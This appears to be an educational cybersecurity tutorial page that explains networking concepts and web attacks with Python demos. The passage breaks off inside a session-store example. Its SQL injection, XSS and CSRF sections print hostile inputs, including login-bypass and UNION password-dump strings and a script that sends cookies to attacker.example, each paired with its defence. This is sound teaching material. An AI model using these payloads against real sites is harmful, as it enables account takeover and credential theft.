Cyber Security Visual Learning Lab

Learn Cybersecurity from Beginner to Advanced using interactive animated HTML simulations. Each concept is visualized step-by-step so that real-world networking and attacks are easy to understand.

Beginner – Networking Basics

Client–Server Model

This is the standard architecture of the internet.
The Concept: One computer (the Client) makes a request, and another computer (the Server) fulfills it.
Analogy: A customer (Client) ordering food at a restaurant, and the kitchen (Server) preparing and serving it.

DNS Resolution

The Concept: Computers communicate using numbers (IP addresses), but humans use names (like google.com). DNS translates the human-readable domain name into the machine-readable IP address. Classic DNS runs over UDP port 53 with no encryption or authentication: a forged reply that arrives first and matches the outstanding query is accepted, which is why poisoning DNS is a common way to set up the MITM attacks covered later.
Analogy: The "Phonebook" of the internet. You look up a name (website) to find their phone number (IP address).
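
The lookup described above, as an added Python example (not one of the lab's HTML simulations): it builds the query packet a resolver would send for an A record, then parses a response. The response is constructed by hand in the same code to look like a resolver's reply, including a compression pointer back to the question name; nothing is sent on the network, and the 192.0.2.1 address is a documentation (TEST-NET) value.

```python
import struct

# Added example (not one of the lab's simulations): build a DNS A-record query
# and parse the answer section of a response. The response used below is
# constructed by hand to look like what a resolver would return; nothing is
# sent on the network.


def encode_name(name: str) -> bytes:
    """Encode 'www.example.com' as length-prefixed labels ending in a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError("each label must be 1..63 bytes")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_query(name: str, txn_id: int = 0x1234) -> bytes:
    """12-byte header (flags 0x0100 = recursion desired) + one question:
    QNAME, QTYPE=1 (A record), QCLASS=1 (IN)."""
    header = struct.pack("!HHHHHH", txn_id, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)


def decode_name(msg: bytes, offset: int):
    """Decode a name at `offset`, following compression pointers (top two bits
    set, 0xC0xx). Returns (name, offset just past the name in the stream)."""
    labels, end, jumped, hops = [], offset, False, 0
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:                      # pointer to an earlier name
            pointer = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            if not jumped:
                end = offset + 2
            jumped, offset, hops = True, pointer, hops + 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            continue
        offset += 1
        if length == 0:                                 # root label ends the name
            if not jumped:
                end = offset
            return ".".join(labels), end
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length


def parse_response(msg: bytes) -> dict:
    """Return the transaction id, response code and all A answers as
    (name, ttl, dotted IP)."""
    txn_id, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", msg[:12])
    offset = 12
    for _ in range(qdcount):                            # skip the echoed question(s)
        _, offset = decode_name(msg, offset)
        offset += 4                                     # QTYPE + QCLASS
    answers = []
    for _ in range(ancount):
        name, offset = decode_name(msg, offset)
        rtype, rclass, ttl, rdlength = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        rdata = msg[offset:offset + rdlength]
        offset += rdlength
        if rtype == 1 and rclass == 1 and rdlength == 4:
            answers.append((name, ttl, ".".join(str(b) for b in rdata)))
    return {"id": txn_id, "rcode": flags & 0x000F, "answers": answers}


def build_sample_response(query: bytes, ip: str, ttl: int = 300) -> bytes:
    """Constructed reply: same id, flags 0x8180 (response, recursion available),
    the question echoed back, and one A record whose name is a compression
    pointer (0xC00C) to the question name at offset 12."""
    txn_id = struct.unpack("!H", query[:2])[0]
    header = struct.pack("!HHHHHH", txn_id, 0x8180, 1, 1, 0, 0)
    question = query[12:]
    rdata = bytes(int(octet) for octet in ip.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + rdata
    return header + question + answer


if __name__ == "__main__":
    query = build_query("www.example.com")
    response = build_sample_response(query, "192.0.2.1")   # TEST-NET address
    print(parse_response(response))
```

The only things a plain DNS client can check on a reply are that the 16-bit transaction id and the question match what it sent, which is why an attacker who can guess or observe them can answer in the resolver's place.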

HTTP vs HTTPS

HTTP (HyperText Transfer Protocol): Transmits data in plain text. Anyone on the path (the Wi-Fi owner, your ISP, an attacker) can read or modify it.
HTTPS (S for Secure): HTTP wrapped in TLS (the successor to SSL). The content is encrypted, so an eavesdropper sees only gibberish, and the server proves its identity with a certificate, so you also know you are talking to the real site and not an impostor.
Key Difference: HTTP is like sending a postcard (readable by anyone); HTTPS is like sending a sealed, locked briefcase. Note that HTTPS hides what you send, not where: the destination IP address and usually the hostname remain visible on the wire.

IP Address & Ports

IP Address: The address that identifies a device on a network (e.g., 192.168.1.1). Public addresses are unique on the internet; addresses like 192.168.x.x belong to private ranges reused inside countless home and office networks and are only unique within that network.
Port: A number from 0 to 65535 that identifies a specific service on that device (e.g., web servers listen on port 80 for HTTP and 443 for HTTPS). A connection is therefore always addressed as IP address plus port.
Analogy: The IP address is the Street Address of a building. The Port is the specific Apartment Number inside that building.

TCP vs UDP

TCP (Transmission Control Protocol): the "Reliable Delivery" method.
Analogy: A registered letter. You get a receipt confirming it arrived, and if it gets lost, the post office sends it again.
Connection-Oriented: Performs a three-way handshake (SYN -> SYN-ACK -> ACK, or "Hello? -> Hi! -> Okay, let's talk") before sending any data.
Guaranteed Delivery: Every segment must be acknowledged; if a packet is lost, no acknowledgement comes back and TCP resends it.
Ordered: Sequence numbers let the receiver reassemble data in the exact order it was sent (1, 2, 3...), even if packets arrive out of order.
Use Case: Web browsing (HTTP/HTTPS), Email (SMTP), and File Transfers (FTP). You wouldn't want an email to arrive with missing words!

UDP (User Datagram Protocol): the "Fire and Forget" method.
Analogy: A live radio broadcast. The station sends the signal out; if you miss a second of audio because of static, the station doesn't stop and replay it for you, it just keeps going.
Connectionless: No handshake. It just starts "firing" datagrams at the destination immediately.
No Guarantees: If a packet is lost, it's gone; there is no retransmission and no ordering.
Lower Overhead: Because it neither sets up a connection nor waits for acknowledgements, it has less delay and less per-packet overhead than TCP ("faster" in the sense of lower latency, not more bandwidth).
Use Case: DNS lookups, online gaming, real-time streaming, and video calls (Zoom/Teams). It's better to have a tiny glitch in a video call than for the whole call to freeze while it waits for a "lost" frame.
Security Note: With no handshake there is nothing to prove where a datagram came from, so UDP source addresses are trivially forged; that is what makes UDP services such as DNS the favourite amplifiers in the DDoS attacks covered later.
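
The two delivery models side by side, as an added Python example (not one of the lab's HTML simulations): the same message is pushed through a deliberately lossy in-process "channel" once the UDP way and once with a handshake, sequence numbers and retransmission. The channel, the drop pattern and the message are constructed; no real sockets are involved, and a lost acknowledgement is modelled the same way as a lost segment.

```python
# Added example (not one of the lab's simulations): the same message sent over
# a deliberately lossy in-process "channel" two ways. udp_like_send fires each
# datagram once; tcp_like_send handshakes first, numbers every segment and
# retransmits until it is acknowledged. No real sockets are used.


class LossyChannel:
    """Drops the Nth transmission for every N in `drop_pattern`. Deterministic
    so the run is reproducible; real networks lose and reorder at random."""

    def __init__(self, drop_pattern):
        self.drop_pattern = set(drop_pattern)
        self.sent = 0

    def transmit(self, packet):
        """Return the packet if it reached the other side, None if it was lost.
        A lost acknowledgement is modelled the same way as a lost segment."""
        self.sent += 1
        return None if self.sent in self.drop_pattern else packet


def udp_like_send(channel, chunks):
    """Connectionless, no acknowledgements: whatever arrives is the result and
    missing chunks are simply gone."""
    received = []
    for chunk in chunks:
        delivered = channel.transmit(chunk)
        if delivered is not None:
            received.append(delivered)
    return received


def tcp_like_send(channel, chunks, max_retries=5):
    """Three-way handshake, then each segment carries a sequence number and is
    resent until acknowledged. Returns (data as reassembled by the receiver,
    event log). Raises ConnectionError when retries are exhausted."""
    log = []
    for step in ("SYN", "SYN-ACK", "ACK"):
        for _ in range(max_retries):
            if channel.transmit(step) is not None:
                log.append(step)
                break
        else:
            raise ConnectionError(f"handshake stalled at {step}")

    receiver_buffer = {}
    for seq, chunk in enumerate(chunks):
        for _ in range(max_retries):
            segment = channel.transmit((seq, chunk))
            if segment is None:
                log.append(f"seq {seq} lost, retransmit")
                continue
            receiver_buffer[segment[0]] = segment[1]   # receiver stores by sequence number
            log.append(f"seq {seq} acked")
            break
        else:
            raise ConnectionError(f"segment {seq} never acknowledged")

    # The receiver hands data up in sequence order, however it arrived.
    return [receiver_buffer[i] for i in sorted(receiver_buffer)], log


SAMPLE_CHUNKS = ["Dear ", "Alice, ", "the ", "password ", "is ", "hunter2"]  # constructed

if __name__ == "__main__":
    print("UDP-like:", "".join(udp_like_send(LossyChannel({2, 5}), SAMPLE_CHUNKS)))
    data, log = tcp_like_send(LossyChannel({2, 5}), SAMPLE_CHUNKS)
    print("TCP-like:", "".join(data))
    print("\n".join(log))
```

With the second and fifth transmissions dropped, the UDP-like send delivers "Dear the password hunter2" with two words missing and no indication that anything was lost, while the TCP-like send loses its first SYN-ACK and its first data segment, retransmits both, and delivers the complete message.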

Firewalls

The Concept: A security system that monitors and controls incoming and outgoing network traffic based on a predetermined set of rules. Rules are normally evaluated top to bottom, the first match decides, and anything that matches nothing falls through to a default, which should be "deny". Stateful firewalls also remember connections, so the replies to a permitted outbound request are let back in automatically.
Analogy: A security guard at a gated community who checks every car's ID against a list of allowed visitors before letting them in.
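
A minimal rule engine of the kind described above, as an added Python example (not one of the lab's HTML simulations). The Rule and Packet types, the rule sets and the sample addresses are constructed for illustration; the second rule set shows the classic ordering mistake, where a broad allow placed above a narrow one makes the narrow rule unreachable.

```python
import ipaddress
from dataclasses import dataclass
from typing import Optional

# Added example (not one of the lab's simulations): a minimal stateless packet
# filter. Rules are evaluated top to bottom, the first match decides, and
# anything unmatched falls through to a default action. The rule sets and the
# sample packets are constructed for illustration.


@dataclass(frozen=True)
class Rule:
    action: str              # "allow" or "deny"
    proto: str               # "tcp", "udp" or "any"
    src: str                 # source network in CIDR form, "0.0.0.0/0" = anywhere
    dst_port: Optional[int]  # None matches every destination port
    comment: str = ""


@dataclass(frozen=True)
class Packet:
    proto: str
    src_ip: str
    dst_port: int


def matches(rule: Rule, pkt: Packet) -> bool:
    if rule.proto != "any" and rule.proto != pkt.proto:
        return False
    if rule.dst_port is not None and rule.dst_port != pkt.dst_port:
        return False
    return ipaddress.ip_address(pkt.src_ip) in ipaddress.ip_network(rule.src)


def evaluate(rules, pkt: Packet, default: str = "deny"):
    """Return (action, index of the deciding rule, or None when the default applied)."""
    for index, rule in enumerate(rules):
        if matches(rule, pkt):
            return rule.action, index
    return default, None


def shadowed_rules(rules):
    """Audit helper: indexes of rules that can never match because an earlier
    rule with the same protocol and port already covers their whole source range."""
    shadowed = []
    for i, later in enumerate(rules):
        later_net = ipaddress.ip_network(later.src)
        for earlier in rules[:i]:
            same_proto = earlier.proto in ("any", later.proto)
            same_port = earlier.dst_port is None or earlier.dst_port == later.dst_port
            if same_proto and same_port and later_net.subnet_of(ipaddress.ip_network(earlier.src)):
                shadowed.append(i)
                break
    return shadowed


INBOUND_RULES = [
    Rule("allow", "tcp", "0.0.0.0/0", 443, "public HTTPS"),
    Rule("allow", "tcp", "10.0.0.0/8", 22, "SSH from the internal network only"),
    Rule("deny", "any", "0.0.0.0/0", None, "explicit default deny"),
]

# A common misconfiguration: the broad allow sits above the narrow one, so the
# internal-only restriction never takes effect.
MISORDERED_RULES = [
    Rule("allow", "tcp", "0.0.0.0/0", 22, "SSH from anywhere (too broad)"),
    Rule("allow", "tcp", "10.0.0.0/8", 22, "meant to restrict SSH, but shadowed"),
    Rule("deny", "any", "0.0.0.0/0", None, "default deny"),
]

if __name__ == "__main__":
    for pkt in (Packet("tcp", "203.0.113.5", 443), Packet("tcp", "203.0.113.5", 22),
                Packet("tcp", "10.1.2.3", 22), Packet("udp", "10.1.2.3", 53)):
        print(pkt, "->", evaluate(INBOUND_RULES, pkt))
    print("shadowed in MISORDERED_RULES:", shadowed_rules(MISORDERED_RULES))
```

Real firewalls add direction, destination address and connection state to the match, but the two lessons carry over unchanged: order matters, and an explicit deny-all at the end makes the default visible in the rule set instead of relying on the device's built-in behaviour.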

Encryption

The Concept: Transforming readable data (plaintext) into unreadable ciphertext using an algorithm and a key, so that only someone holding the right key can recover the original.
Symmetric: One shared secret key both locks and unlocks (e.g., AES). Fast, but both parties must already have the same key, which is the hard part.
Asymmetric: A Public Key locks (encrypts) and the matching Private Key unlocks (decrypts) (e.g., RSA). Anyone may hold the public key; only the owner holds the private key. In practice (as in TLS) the two are combined: asymmetric cryptography is used to agree on a symmetric key, which then protects the bulk of the data.
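
Both key models in working code, as an added Python example (not one of the lab's HTML simulations). The symmetric half is a toy stream cipher (an HMAC-SHA256 keystream XORed with the data); the asymmetric half is textbook RSA with the tiny primes 61 and 53. Both are constructed for illustration only: they show one key versus two keys, not a cipher anyone should deploy, and real systems use AES-GCM or ChaCha20-Poly1305 and RSA-OAEP or elliptic-curve schemes with proper key sizes.

```python
import hashlib
import hmac
import secrets

# Added example (not one of the lab's simulations): the two key models side by
# side. The symmetric part is a toy stream cipher (keystream from HMAC-SHA256,
# XORed with the data); the asymmetric part is textbook RSA with tiny primes.
# Both are for illustration only, not for real use.

NONCE_LEN = 12


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Expand (key, nonce) into `length` pseudorandom bytes, one HMAC block at a time."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def symmetric_encrypt(key: bytes, plaintext: bytes) -> bytes:
    """One key locks. A fresh random nonce makes every ciphertext different
    even for the same plaintext; it travels in the clear at the front."""
    nonce = secrets.token_bytes(NONCE_LEN)
    stream = keystream(key, nonce, len(plaintext))
    return nonce + bytes(p ^ k for p, k in zip(plaintext, stream))


def symmetric_decrypt(key: bytes, ciphertext: bytes) -> bytes:
    """The same key unlocks: regenerate the keystream and XOR again."""
    nonce, body = ciphertext[:NONCE_LEN], ciphertext[NONCE_LEN:]
    stream = keystream(key, nonce, len(body))
    return bytes(c ^ k for c, k in zip(body, stream))


def rsa_keygen(p: int = 61, q: int = 53, e: int = 17):
    """Textbook RSA: n = p*q is public, d is the private exponent with
    e*d = 1 mod (p-1)(q-1). Returns (public_key, private_key)."""
    n = p * q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)          # modular inverse (Python 3.8+)
    return (e, n), (d, n)


def rsa_encrypt(public_key, m: int) -> int:
    """Anyone holding the public key can lock a message m < n."""
    e, n = public_key
    if not 0 <= m < n:
        raise ValueError("message must be an integer in [0, n)")
    return pow(m, e, n)


def rsa_decrypt(private_key, c: int) -> int:
    """Only the private exponent unlocks it."""
    d, n = private_key
    return pow(c, d, n)


if __name__ == "__main__":
    key = secrets.token_bytes(32)
    ct = symmetric_encrypt(key, b"attack at dawn")
    print("symmetric round trip:", symmetric_decrypt(key, ct))

    public, private = rsa_keygen()
    c = rsa_encrypt(public, 65)
    print("RSA:", public, private, "65 ->", c, "->", rsa_decrypt(private, c))
    # Applying the public exponent again does not recover the message:
    print("public key cannot unlock:", pow(c, public[0], public[1]))
```

With p = 61 and q = 53 the key pair is (17, 3233) public and (2753, 3233) private, and the message 65 encrypts to 2790; applying the public exponent to 2790 gives something other than 65, which is the whole point of having two different keys.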

Authentication vs Authorization

Authentication (Who are you?): Verifying identity (e.g., Logging in with a password, a hardware key, or a one-time code).
Authorization (What can you do?): Verifying permissions (e.g., A regular user vs. an Admin). Authentication comes first, but authorization must be enforced on every request, not just at login; skipping that check is how the privilege escalation attacks described later happen.
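
The two questions kept apart in code, as an added Python example (not one of the lab's HTML simulations): authenticate() answers "who are you?" from a salted PBKDF2 password hash, and authorize() answers "what may you do?" from a role-to-permission table. The users, roles, permissions and the delete_user operation are constructed for illustration.

```python
import hashlib
import hmac
import os

# Added example (not one of the lab's simulations): a tiny account system that
# keeps the two questions separate. authenticate() answers "who are you?" from a
# salted PBKDF2 password hash; authorize() answers "what may you do?" from a
# role-to-permission table. Users, roles and permissions are constructed.

ITERATIONS = 100_000
PERMISSIONS = {
    "user": {"read_own_profile"},
    "admin": {"read_own_profile", "delete_user", "view_audit_log"},
}
USERS = {}   # username -> {"salt": bytes, "hash": bytes, "role": str}


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)


def register(username: str, password: str, role: str = "user") -> None:
    salt = os.urandom(16)                       # per-user salt defeats precomputed tables
    USERS[username] = {"salt": salt, "hash": _hash_password(password, salt), "role": role}


def authenticate(username: str, password: str):
    """Who are you? Returns the username on success, None otherwise. The same
    hashing work and a constant-time comparison run whether or not the account
    exists, so response timing does not reveal which usernames are valid."""
    record = USERS.get(username)
    salt = record["salt"] if record else b"\x00" * 16
    expected = record["hash"] if record else b"\x00" * 32
    candidate = _hash_password(password, salt)
    if record is not None and hmac.compare_digest(candidate, expected):
        return username
    return None


def authorize(username: str, action: str) -> bool:
    """What may you do? Checked on every request, not only at login."""
    record = USERS.get(username)
    return record is not None and action in PERMISSIONS.get(record["role"], set())


def delete_user(actor: str, target: str) -> str:
    """A protected operation: being logged in is not enough, the role must allow it."""
    if not authorize(actor, "delete_user"):
        return f"403: {actor} is authenticated but not authorized to delete users"
    USERS.pop(target, None)
    return f"200: {actor} deleted {target}"


if __name__ == "__main__":
    register("alice", "correct horse battery staple")
    register("root", "hunter2", role="admin")
    print(authenticate("alice", "correct horse battery staple"))   # alice
    print(authenticate("alice", "wrong password"))                 # None
    print(delete_user("alice", "root"))                            # 403 ...
    print(delete_user("root", "alice"))                            # 200 ...
```

Note that delete_user() calls authorize() itself rather than trusting that the caller already did; every sensitive operation should make that check locally, because the one place it is forgotten is the one an attacker will find.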

Intermediate – Attacks

MITM Attack

The Concept: An attacker secretly relays and possibly alters the communication between two parties who believe they are communicating directly with each other.
Scenario: You connect to a fake public Wi-Fi named "Free Coffee". The attacker controls the router and can read or alter anything you send in plain text (HTTP). With HTTPS they can still see which sites you connect to, but not what you send, unless they can trick you into accepting a forged certificate or into falling back to HTTP.

Phishing

The Concept: A social engineering attack used to steal user data, including login credentials and credit card numbers.
Mechanism: Usually arrives by email (or text message), masquerading as a trusted entity (e.g., "Urgent: Reset your Bank Password"). The link leads to a look-alike login page that captures whatever you type, or to a file that installs malware.

SQL Injection

The Concept: An attacker interferes with the queries an application makes to its database.
Mechanism: Typing malicious input into a login box (like ' OR 1=1 --) so that the input is treated as part of the SQL statement rather than as a value, tricking the database into revealing information or logging the attacker in without a password. The fix is never to build queries by string concatenation: parameterized (prepared) queries send the statement and the values separately, so input is always treated as data.
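
The login above implemented both ways against an in-memory SQLite table, as an added Python example (not one of the lab's HTML simulations). The table, the two accounts and the attacker inputs are constructed; passwords are stored in plain text only to keep the injection visible, a real application stores slow salted hashes.

```python
import sqlite3

# Added example (not one of the lab's simulations): the login described above
# implemented twice against an in-memory SQLite table. The table, accounts and
# the attacker's input are constructed. Passwords are stored in plain text only
# to keep the injection visible; a real application stores slow salted hashes.


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Builds SQL by string formatting. Whatever the user types becomes part of
    the statement, so a quote breaks out of the literal and -- comments out the rest."""
    query = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username: str, password: str):
    """Parameterised query: the statement text is fixed and the values are
    bound separately, so the same input is compared as an ordinary string."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def dump_users_vulnerable(conn, username: str):
    """A second classic: with the same flaw, the attacker appends a UNION to pull
    a different column (here every password) out through a harmless-looking lookup."""
    query = f"SELECT username FROM users WHERE username = '{username}'"
    return [row[0] for row in conn.execute(query).fetchall()]


PAYLOAD_BYPASS = "' OR 1=1 --"
PAYLOAD_UNION = "x' UNION SELECT password FROM users --"

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", login_vulnerable(conn, PAYLOAD_BYPASS, "anything"))   # alice
    print("safe:      ", login_safe(conn, PAYLOAD_BYPASS, "anything"))         # None
    print("union dump:", dump_users_vulnerable(conn, PAYLOAD_UNION))           # all passwords
```

The vulnerable query becomes SELECT username FROM users WHERE username = '' OR 1=1 --' AND password = 'anything': the condition is always true and the rest of the line is a comment, so the first row (alice) is returned. The parameterised version looks for a user literally named ' OR 1=1 -- and finds nothing.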

XSS

The Concept: Attackers inject malicious scripts into trusted websites viewed by other users.
Mechanism: Posting a comment on a blog that contains a hidden <script> tag. When others view the comment, their browser executes the script with the trust of the blog itself, potentially stealing their session cookies (unless the cookie is marked HttpOnly) or performing actions as them. The defence is output encoding: escape untrusted data for the exact context it is inserted into (HTML text, attribute, URL, JavaScript), and back it up with a Content Security Policy.
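
The blog comment rendered both ways on the server side, as an added Python example (not one of the lab's HTML simulations). The comment payload and the attacker.example address are constructed; safe_link() is included to show that entity encoding alone does not help in a URL attribute, where a javascript: link has to be rejected by scheme.

```python
import html
from urllib.parse import urlparse

# Added example (not one of the lab's simulations): the blog comment rendered
# twice, once by pasting the text straight into the HTML and once with output
# encoding. safe_link shows that encoding alone is not enough in a URL
# attribute. The comment text and payloads are constructed.

# What a stored-XSS payload looks like: once in the page, every viewer's browser
# runs it with that viewer's cookies (unless the cookie is HttpOnly).
PAYLOAD = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"


def render_comment_vulnerable(author: str, body: str) -> str:
    """Untrusted text inserted verbatim: the browser cannot tell it from markup."""
    return f"<div class=\"comment\"><b>{author}</b>: {body}</div>"


def render_comment_safe(author: str, body: str) -> str:
    """HTML entity encoding for text content: < > & " ' become entities, so the
    payload is displayed as text instead of being executed."""
    return f"<div class=\"comment\"><b>{html.escape(author)}</b>: {html.escape(body)}</div>"


def safe_link(url: str, text: str) -> str:
    """URL attribute context: escaping does not neutralise a javascript: URL,
    so the scheme is checked against an allow-list before the value is encoded."""
    scheme = urlparse(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        url = "#"
    return f"<a href=\"{html.escape(url, quote=True)}\">{html.escape(text)}</a>"


if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", PAYLOAD))
    print(render_comment_safe("mallory", PAYLOAD))
    print(safe_link("javascript:alert(document.cookie)", "free gift"))
    print(safe_link("https://example.org/?a=1&b=2", "ok"))
```

Templating engines such as Jinja2 do the html.escape step automatically when autoescaping is on; the bugs appear where a developer marks content "safe" to get raw HTML through, or inserts data into a context (URL, inline script, CSS) that HTML entity encoding was never designed for.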

CSRF

The Concept: An attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated.
Scenario: You are logged into your bank. You open a web page or email containing a hidden form or image that secretly tells your browser to send a "Transfer Money" request to the bank. The browser attaches your bank session cookie automatically, so the bank accepts the request because you are logged in. Defences: an anti-CSRF token in every state-changing form that the attacker's page cannot read, and the SameSite cookie attribute so the cookie is not sent with cross-site requests.
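
The bank's transfer endpoint modelled as a function of a request dictionary, as an added Python example (not one of the lab's HTML simulations). The session store, the request shape ({"cookies": ..., "form": ...}) and the forged request are constructed; transfer_vulnerable() trusts the cookie alone, transfer_safe() also demands a per-session token that only the bank's own page can embed.

```python
import hmac
import secrets

# Added example (not one of the lab's simulations): the bank's "transfer"
# endpoint modelled as a function of a request dict ({"cookies": ..., "form": ...}).
# The vulnerable version trusts the session cookie alone; the safe version also
# demands a per-session anti-CSRF token. Sessions and requests are constructed.

SESSIONS = {}   # session id -> {"user": str, "csrf": str}


def login(user: str) -> str:
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid: str) -> str:
    """The legitimate page embeds this in its form. An attacker's page cannot
    read it: the same-origin policy keeps the bank's HTML out of reach."""
    return SESSIONS[sid]["csrf"]


def _session_from(request):
    return SESSIONS.get(request.get("cookies", {}).get("sid"))


def transfer_vulnerable(request):
    """The browser attaches the bank cookie to any request aimed at the bank,
    including one a hidden form on attacker.example submits on your behalf."""
    session = _session_from(request)
    if session is None:
        return 401, "not logged in"
    form = request["form"]
    return 200, f"{session['user']} sent {form['amount']} to {form['to']}"


def transfer_safe(request):
    """Same session check, plus the token. A forged cross-site request carries
    the cookie but not the token, so it is refused."""
    session = _session_from(request)
    if session is None:
        return 401, "not logged in"
    token = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(token, session["csrf"]):
        return 403, "csrf token missing or invalid"
    form = request["form"]
    return 200, f"{session['user']} sent {form['amount']} to {form['to']}"


if __name__ == "__main__":
    sid = login("alice")
    # Constructed forged request: the victim's cookie, the attacker's form fields.
    forged = {"cookies": {"sid": sid}, "form": {"to": "mallory", "amount": "1000"}}
    print("vulnerable:", transfer_vulnerable(forged))   # (200, 'alice sent 1000 to mallory')
    print("safe:      ", transfer_safe(forged))         # (403, 'csrf token missing or invalid')
    legit = {"cookies": {"sid": sid},
             "form": {"to": "bob", "amount": "10", "csrf_token": csrf_token_for(sid)}}
    print("legit:     ", transfer_safe(legit))          # (200, 'alice sent 10 to bob')
```

The token is compared with hmac.compare_digest rather than == so that a guessing attacker learns nothing from response timing; web frameworks ship this mechanism built in, and the usual mistake is exempting an endpoint from it.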

Brute Force

The Concept: A trial-and-error method used to obtain information such as a user password or personal identification number (PIN).
Mechanism: Trying every possible combination of characters until the correct one is found (or, more efficiently, trying common passwords first, a "dictionary attack"). Against a live login it is defeated by rate limiting and account lockout; against a stolen database of hashes it is slowed only by long passwords and deliberately slow, salted hashing (bcrypt, scrypt, Argon2).
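
The exhaustive search in both settings, as an added Python example (not one of the lab's HTML simulations): offline against a stored hash of a 4-digit PIN, and online against a server that locks the account after a few failures. The PIN, the hash and the LockoutGuard are constructed; SHA-256 is used so the offline search is fast enough to watch, which is exactly why stored credentials should use a slow hash instead.

```python
import hashlib
import itertools
import string

# Added example (not one of the lab's simulations): exhaustive search of a
# 4-digit PIN against a stored hash, and the same search against a server that
# locks the account after a few failures. The PIN and hash are constructed.


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def keyspace_size(alphabet_size: int, length: int) -> int:
    """Number of candidates the attacker must try in the worst case."""
    return alphabet_size ** length


def seconds_to_exhaust(alphabet_size: int, length: int, guesses_per_second: float) -> float:
    return keyspace_size(alphabet_size, length) / guesses_per_second


def brute_force_pin(target_hash: str, length: int = 4):
    """Offline attack on a stolen hash: try 0000, 0001, ... until one matches.
    Returns (pin, attempts) or (None, attempts). A fast hash like SHA-256 makes
    this instant; a slow hash multiplies the cost of every single guess."""
    attempts = 0
    for digits in itertools.product(string.digits, repeat=length):
        attempts += 1
        pin = "".join(digits)
        if sha256_hex(pin) == target_hash:
            return pin, attempts
    return None, attempts


class LockoutGuard:
    """Online defence: after max_attempts failures the account refuses guesses."""

    def __init__(self, max_attempts: int = 5):
        self.max_attempts = max_attempts
        self.failures = {}

    def try_login(self, user: str, pin: str, real_pin: str) -> str:
        if self.failures.get(user, 0) >= self.max_attempts:
            return "locked"
        if pin == real_pin:
            self.failures[user] = 0
            return "ok"
        self.failures[user] = self.failures.get(user, 0) + 1
        return "wrong"


def online_attack(guard: LockoutGuard, user: str, real_pin: str, length: int = 4):
    """The same exhaustive search, but every guess goes through the guard."""
    for digits in itertools.product(string.digits, repeat=length):
        pin = "".join(digits)
        result = guard.try_login(user, pin, real_pin)
        if result in ("ok", "locked"):
            return result, pin
    return "exhausted", None


if __name__ == "__main__":
    print(brute_force_pin(sha256_hex("4829")))                      # ('4829', 4830)
    print(online_attack(LockoutGuard(5), "alice", "4829"))          # ('locked', '0005')
    print(f"8-char alphanumeric at 1e10 guesses/s: {seconds_to_exhaust(62, 8, 1e10):.0f} s")
```

Lockout stops the online attacker after five guesses, but it also lets an attacker lock legitimate users out on purpose; production systems usually prefer escalating delays or per-source rate limits for that reason.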

Session Hijacking

The Concept: The exploitation of a valid computer session, identified by a session token (sometimes also called a session key), to gain unauthorized access to information or services in a computer system.
Mechanism: Stealing the "Session Cookie" (via XSS, by sniffing unencrypted traffic, or with malware on the device) so the server thinks the attacker is you. The token is a bearer credential: whoever presents it is treated as its owner. Defences: the HttpOnly and Secure cookie flags, short idle timeouts, issuing a new session id at login, and invalidating sessions on the server at logout.
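
A server-side session store that shows both the problem and the controls, as an added Python example (not one of the lab's HTML simulations). The store, its cookie header and the injectable clock are constructed: whoever presents a valid session id is treated as its owner, which is what makes a stolen cookie useful, and the idle timeout and server-side logout are what shrink that window.

```python
import secrets
import time

# Added example (not one of the lab's simulations): a server-side session store.
# Whoever presents a valid session id is treated as its owner, which is exactly
# what makes a stolen cookie useful; the store then shows the controls that
# shrink the window (cookie flags, idle timeout, server-side logout). The clock
# is injectable so the expiry can be demonstrated without waiting.


class SessionStore:
    def __init__(self, idle_timeout: float = 900, clock=time.time):
        self.sessions = {}          # session id -> {"user": str, "last_seen": float}
        self.idle_timeout = idle_timeout
        self.clock = clock

    def create(self, user: str) -> str:
        """256 random bits: cannot be guessed, so an attacker has to steal it.
        Called afresh at every login so a pre-set (fixated) id is never kept."""
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {"user": user, "last_seen": self.clock()}
        return sid

    @staticmethod
    def set_cookie_header(sid: str) -> str:
        """HttpOnly keeps page scripts (XSS) from reading it, Secure keeps it off
        plain HTTP where a sniffer could see it, SameSite limits cross-site sends."""
        return f"Set-Cookie: sid={sid}; Path=/; HttpOnly; Secure; SameSite=Lax"

    def whoami(self, sid: str):
        """The server's view: a bearer token, with no proof of who is holding it."""
        session = self.sessions.get(sid)
        if session is None:
            return None
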